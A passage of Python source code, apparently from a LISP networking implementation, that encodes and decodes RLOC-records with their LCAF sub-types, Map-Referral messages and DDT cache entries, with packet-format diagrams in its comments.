self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# JSON Data Model Type Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 14 | kid | Rvd2|E|B| Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | JSON length | JSON binary/text encoding ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Optional Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When the E-bit is set to 1, the 'kid' field is a key-id indicating that
# the value fields in the JSON string are encrypted with the encryption
# key associated with that key-id.
#
class lisp_rloc_record(object):
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False,
True))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and name in lisp_geo_list):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and name in lisp_elp_list):
self.elp = lisp_elp_list[name]
#endif
#endif
if (rloc_entry.rle):
self.rle = rloc_entry.rle
else:
name = rloc_entry.rle_name
if (name and name in lisp_rle_list):
self.rle = lisp_rle_list[name]
#endif
#endif
if (rloc_entry.json):
self.json = rloc_entry.json
else:
name = rloc_entry.json_name
if (name and name in lisp_json_list):
self.json = lisp_json_list[name]
#endif
#endif
self.priority = rloc_entry.priority
self.weight = rloc_entry.weight
self.mpriority = rloc_entry.mpriority
self.mweight = rloc_entry.mweight
#enddef
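#
# In the JSON LCAF below, the 'kid' byte carries the key-id in its
# upper 5 bits plus the E-bit (0x02) when the JSON values are
# encrypted. For telemetry JSON the RLOC address is appended after the
# JSON string; otherwise an AFI of 0 follows it.
#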
def encode_json(self, lisp_json):
json_string = lisp_json.json_string
kid = 0
if (lisp_json.json_encrypted):
kid = (lisp_json.json_key_id << 5) | 0x02
#endif
lcaf_type = LISP_LCAF_JSON_TYPE
lcaf_afi = socket.htons(LISP_AFI_LCAF)
addr_len = self.rloc.addr_length() + 2
lcaf_len = socket.htons(len(json_string) + addr_len)
json_len = socket.htons(len(json_string))
packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, kid,
lcaf_len, json_len)
packet += json_string.encode()
#
# If telemetry, store RLOC address in LCAF.
#
if (lisp_is_json_telemetry(json_string)):
packet += struct.pack("H", socket.htons(self.rloc.afi))
packet += self.rloc.pack_address()
else:
packet += struct.pack("H", 0)
#endif
return(packet)
#enddef
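#
# encode_lcaf() wraps the RLOC and any of its attributes (rloc-name,
# geo, ELP, RLE, security keys, JSON) in an AFI-List LCAF so multiple
# sub-LCAFs can be carried in a single RLOC-record.
#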
def encode_lcaf(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
gpkt = b""
if (self.geo):
gpkt = self.geo.encode_geo()
#endif
epkt = b""
if (self.elp):
elp_recs = b""
for elp_node in self.elp.elp_nodes:
afi = socket.htons(elp_node.address.afi)
flags = 0
if (elp_node.eid): flags |= 0x4
if (elp_node.probe): flags |= 0x2
if (elp_node.strict): flags |= 0x1
flags = socket.htons(flags)
elp_recs += struct.pack("HH", flags, afi)
elp_recs += elp_node.address.pack_address()
#endfor
elp_len = socket.htons(len(elp_recs))
epkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_ELP_TYPE,
0, elp_len)
epkt += elp_recs
#endif
rpkt = b""
if (self.rle):
rle_recs = b""
for rle_node in self.rle.rle_nodes:
afi = socket.htons(rle_node.address.afi)
rle_recs += struct.pack("HBBH", 0, 0, rle_node.level, afi)
rle_recs += rle_node.address.pack_address()
if (rle_node.rloc_name):
rle_recs += struct.pack("H", socket.htons(LISP_AFI_NAME))
rle_recs += (rle_node.rloc_name + "\0").encode()
#endif
#endfor
rle_len = socket.htons(len(rle_recs))
rpkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_RLE_TYPE,
0, rle_len)
rpkt += rle_recs
#endif
jpkt = b""
if (self.json):
jpkt = self.encode_json(self.json)
#endif
spkt = b""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
spkt = self.keys[1].encode_lcaf(self.rloc)
#endif
npkt = b""
if (self.rloc_name):
npkt += struct.pack("H", socket.htons(LISP_AFI_NAME))
npkt += (self.rloc_name + "\0").encode()
#endif
apkt_len = len(gpkt) + len(epkt) + len(rpkt) + len(spkt) + 2 + \
len(jpkt) + self.rloc.addr_length() + len(npkt)
apkt_len = socket.htons(apkt_len)
apkt = struct.pack("HBBBBHH", lcaf_afi, 0, 0, LISP_LCAF_AFI_LIST_TYPE,
0, apkt_len, socket.htons(self.rloc.afi))
apkt += self.rloc.pack_address()
return(apkt + npkt + gpkt + epkt + rpkt + spkt + jpkt)
#enddef
def encode(self):
flags = 0
if (self.local_bit): flags |= 0x0004
if (self.probe_bit): flags |= 0x0002
if (self.reach_bit): flags |= 0x0001
packet = struct.pack("BBBBHH", self.priority, self.weight,
self.mpriority, self.mweight, socket.htons(flags),
socket.htons(self.rloc.afi))
if (self.geo or self.elp or self.rle or self.keys or self.rloc_name \
or self.json):
try:
packet = packet[0:-2] + self.encode_lcaf()
except:
lprint("Could not encode LCAF for RLOC-record")
#endtry
else:
packet += self.rloc.pack_address()
#endif
return(packet)
#enddef
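#
# decode_lcaf() handles the LCAF types that can appear in an
# RLOC-record: AFI-List (which may nest the other types), Geo-Coord,
# JSON, ELP, RLE, and Security. Any other LCAF type is skipped over
# using its encoded length.
#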
def decode_lcaf(self, packet, nonce, ms_json_encrypt):
packet_format = "HBBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
#
# Process AFI-List LCAF.
#
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE):
while (lcaf_len > 0):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
packet_len = len(packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF):
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
if (packet == None): return(None)
else:
packet = packet[format_size::]
self.rloc_name = None
if (afi == LISP_AFI_NAME):
packet, rloc_name = lisp_decode_dist_name(packet)
self.rloc_name = rloc_name
else:
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
#endif
lcaf_len -= packet_len - len(packet)
#endwhile
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
#
# Process Geo-Coordinate LCAF.
#
geo = lisp_geo("")
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
if (packet == None): return(None)
self.geo = geo
elif (lcaf_type == LISP_LCAF_JSON_TYPE):
encrypted_json = rsvd2 & 0x02
#
# Process JSON LCAF.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
json_len = struct.unpack(packet_format, packet[:format_size])[0]
json_len = socket.ntohs(json_len)
if (lcaf_len < format_size + json_len): return(None)
packet = packet[format_size::]
self.json = lisp_json("", packet[0:json_len], encrypted_json,
ms_json_encrypt)
packet = packet[json_len::]
#
# If telemetry, store RLOC address in LCAF.
#
afi = socket.ntohs(struct.unpack("H", packet[:2])[0])
packet = packet[2::]
if (afi != 0 and lisp_is_json_telemetry(self.json.json_string)):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
#endif
elif (lcaf_type == LISP_LCAF_ELP_TYPE):
#
# Process ELP LCAF.
#
elp = lisp_elp(None)
elp.elp_nodes = []
while (lcaf_len > 0):
flags, afi = struct.unpack("HH", packet[:4])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
elp_node = lisp_elp_node()
elp.elp_nodes.append(elp_node)
flags = socket.ntohs(flags)
elp_node.eid = (flags & 0x4)
elp_node.probe = (flags & 0x2)
elp_node.strict = (flags & 0x1)
elp_node.address.afi = afi
elp_node.address.mask_len = elp_node.address.host_mask_len()
packet = elp_node.address.unpack_address(packet[4::])
lcaf_len -= elp_node.address.addr_length() + 4
#endwhile
elp.select_elp_node()
self.elp = elp
elif (lcaf_type == LISP_LCAF_RLE_TYPE):
#
# Process RLE LCAF.
#
rle = lisp_rle(None)
rle.rle_nodes = []
while (lcaf_len > 0):
x, y, level, afi = struct.unpack("HBBH", packet[:6])
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
rle_node = lisp_rle_node()
rle.rle_nodes.append(rle_node)
rle_node.level = level
rle_node.address.afi = afi
rle_node.address.mask_len = rle_node.address.host_mask_len()
packet = rle_node.address.unpack_address(packet[6::])
lcaf_len -= rle_node.address.addr_length() + 6
if (lcaf_len >= 2):
afi = struct.unpack("H", packet[:2])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[2::]
packet, rle_node.rloc_name = \
lisp_decode_dist_name(packet)
if (packet == None): return(None)
lcaf_len -= len(rle_node.rloc_name) + 1 + 2
#endif
#endif
#endwhile
self.rle = rle
self.rle.build_forwarding_list()
elif (lcaf_type == LISP_LCAF_SECURITY_TYPE):
#
# Get a lisp_keys() data structure so we can parse keys in the Map-
# Reply RLOC-record. Then get the RLOC address.
#
orig_packet = packet
decode_key = lisp_keys(1)
packet = decode_key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
#
# Other side may not do ECDH.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_CHACHA]
if (decode_key.cipher_suite in cs_list):
if (decode_key.cipher_suite == LISP_CS_25519_CBC):
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
if (decode_key.cipher_suite == LISP_CS_25519_CHACHA):
key = lisp_keys(1, do_poly=True, do_chacha=True)
#endif
else:
key = lisp_keys(1, do_poly=False, do_chacha=False)
#endif
packet = key.decode_lcaf(orig_packet, lcaf_len)
if (packet == None): return(None)
if (len(packet) < 2): return(None)
afi = struct.unpack("H", packet[:2])[0]
self.rloc.afi = socket.ntohs(afi)
if (len(packet) < self.rloc.addr_length()): return(None)
packet = self.rloc.unpack_address(packet[2::])
if (packet == None): return(None)
self.rloc.mask_len = self.rloc.host_mask_len()
#
# Some RLOC records may not have RLOC addresses but other LCAF
# types. Don't process security keys because we need RLOC addresses
# to index into security data structures.
#
if (self.rloc.is_null()): return(packet)
rloc_name_str = self.rloc_name
if (rloc_name_str): rloc_name_str = blue(self.rloc_name, False)
#
# If we found no stored key, store the newly created lisp_keys()
# to the RLOC list if and only if a remote public-key was supplied
# in the Map-Reply.
#
stored_key = self.keys[1] if self.keys else None
if (stored_key == None):
if (key.remote_public_key == None):
string = bold("No remote encap-public-key supplied", False)
lprint(" {} for {}".format(string, rloc_name_str))
key = None
else:
string = bold("New encap-keying with new state", False)
lprint(" {} for {}".format(string, rloc_name_str))
key.compute_shared_key("encap")
#endif
#endif
#
# If we have stored-key, the other side received the local public
# key that is stored in variable 'stored_key'. If the remote side
# did not supply a public-key, it doesn't want to do lisp-crypto.
# If it did supply a public key, check to see if the same as
# last time, and if so, do nothing, else we do a rekeying.
#
if (stored_key):
if (key.remote_public_key == None):
key = None
remote = bold("Remote encap-unkeying occurred", False)
lprint(" {} for {}".format(remote, rloc_name_str))
elif (stored_key.compare_keys(key)):
key = stored_key
lprint(" Maintain stored encap-keys for {}".format( \
rloc_name_str))
else:
if (stored_key.remote_public_key == None):
string = "New encap-keying for existing state"
else:
string = "Remote encap-rekeying"
#endif
lprint(" {} for {}".format(bold(string, False),
rloc_name_str))
stored_key.remote_public_key = key.remote_public_key
stored_key.compute_shared_key("encap")
key = stored_key
#endif
#endif
self.keys = [None, key, None, None]
else:
#
# All other LCAFs we skip over and ignore.
#
packet = packet[lcaf_len::]
#endif
return(packet)
#enddef
def decode(self, packet, nonce, ms_json_encrypt=False):
packet_format = "BBBBHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.priority, self.weight, self.mpriority, self.mweight, flags, \
afi = struct.unpack(packet_format, packet[:format_size])
flags = socket.ntohs(flags)
afi = socket.ntohs(afi)
self.local_bit = True if (flags & 0x0004) else False
self.probe_bit = True if (flags & 0x0002) else False
self.reach_bit = True if (flags & 0x0001) else False
if (afi == LISP_AFI_LCAF):
packet = packet[format_size-2::]
packet = self.decode_lcaf(packet, nonce, ms_json_encrypt)
else:
self.rloc.afi = afi
packet = packet[format_size::]
packet = self.rloc.unpack_address(packet)
#endif
self.rloc.mask_len = self.rloc.host_mask_len()
return(packet)
#enddef
def end_of_rlocs(self, packet, rloc_count):
for i in range(rloc_count):
packet = self.decode(packet, None, False)
if (packet == None): return(None)
#endfor
return(packet)
#enddef
#endclass
#
# Map-Referral Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=6 | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral(object):
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] attribute is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry(object):
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node(object):
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
